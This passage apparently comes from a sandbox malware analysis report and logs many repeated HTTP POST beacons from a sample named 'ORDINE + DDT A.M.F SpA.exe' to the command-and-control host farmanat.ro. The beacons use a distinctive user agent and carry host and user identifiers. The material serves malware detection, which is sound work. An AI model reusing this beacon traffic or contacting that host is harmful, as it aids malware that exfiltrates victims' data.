                                              Date: Thu, 25 Nov 2021 09:50:48 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              311192.168.11.2050153176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:49.453054905 CET6747OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:49.487144947 CET6748OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:49.536742926 CET6748INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:48 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              312192.168.11.2050154176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:49.981482029 CET6749OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:50.015156984 CET6749OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:50.064557076 CET6749INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              313192.168.11.2050155176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:50.494750977 CET6750OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:50.528975010 CET6750OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:50.586895943 CET6751INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              314192.168.11.2050156176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:51.037018061 CET6751OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:51.071177959 CET6752OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:51.122132063 CET6752INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              315192.168.11.2050157176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:51.551708937 CET6753OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:51.585876942 CET6753OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:51.635710955 CET6753INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              316192.168.11.2050158176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:52.056652069 CET6754OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:52.090846062 CET6754OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:52.140773058 CET6755INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              317192.168.11.2050159176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:52.572449923 CET6755OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:52.606086969 CET6756OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:52.655607939 CET6756INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              318192.168.11.2050160176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:53.087853909 CET6757OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:53.122066021 CET6757OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:53.177290916 CET6757INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              319192.168.11.2050161176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:53.604490042 CET6758OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:53.638037920 CET6758OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:53.694844961 CET6759INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              32192.168.11.2049867176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:22.464833975 CET6349OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:22.498878956 CET6349OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:22.549273968 CET6349INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              320192.168.11.2050162176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:54.126116991 CET6759OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:54.159674883 CET6760OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:54.213871956 CET6760INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              321192.168.11.2050163176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:54.652802944 CET6761OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:54.686389923 CET6761OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:54.736171007 CET6761INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              322192.168.11.2050164176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:55.150613070 CET6762OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:55.184221029 CET6762OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:55.233901024 CET6763INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:54 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              323192.168.11.2050166176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:55.643187046 CET6769OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:55.677305937 CET6770OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:55.729120016 CET6770INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:54 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              324192.168.11.2050167176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:56.163151979 CET6771OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:56.196743965 CET6771OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:56.246516943 CET6771INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:55 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              325192.168.11.2050168176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:56.612755060 CET6772OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:56.646243095 CET6772OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:56.695430040 CET6773INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:55 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              326192.168.11.2050169176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:57.123615026 CET6773OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:57.157768011 CET6773OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:57.211141109 CET6774INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              327192.168.11.2050170176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:57.646528006 CET6775OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:57.680763960 CET6775OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:57.730470896 CET6775INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:56 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              328192.168.11.2050171176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:58.136639118 CET6776OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
